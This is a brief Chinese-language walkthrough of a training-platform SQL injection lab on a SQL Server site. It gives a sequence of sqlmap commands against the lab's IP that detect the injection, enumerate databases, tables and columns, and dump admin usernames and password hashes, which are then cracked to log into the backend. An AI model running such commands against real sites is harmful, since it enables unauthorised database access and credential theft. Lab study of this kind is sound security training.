SQL手工注入漏洞测试(Sql Server数据库)
解决https://www.mozhe.cn/bug/detail/90问题
一、粗略判断
点击链接访问后
点击【关于平台停机维护】后进入下面这个页面
id=2 有可能存在SQL注入漏洞
二、进入kali虚拟机判断:
1.判断网站是否存在SQL注入漏洞
sqlmap -u http://219.153.49.228:42760/new_list.asp?id=2
2.查看该网站所有数据库
sqlmap -u http://219.153.49.228:42760/new_list.asp?id=2 --dbs
3.查看当前使用的数据库
sqlmap -u http://219.153.49.228:42760/new_list.asp?id=2 --current-db
4.查看当前使用数据库的表
sqlmap -u http://219.153.49.228:49413/new_list.asp?id=2 -D mozhe_db_v2 --tables
5.查看敏感表的列名
sqlmap -u http://219.153.49.228:49413/new_list.asp?id=2 -D mozhe_db_v2 -T manage --columns
6.查看敏感数据
sqlmap -u http://219.153.49.228:42760/new_list.asp?id=1 -T admin -C passwd,username --dump
得到密码用MD5解密得明文 登录后台 得到key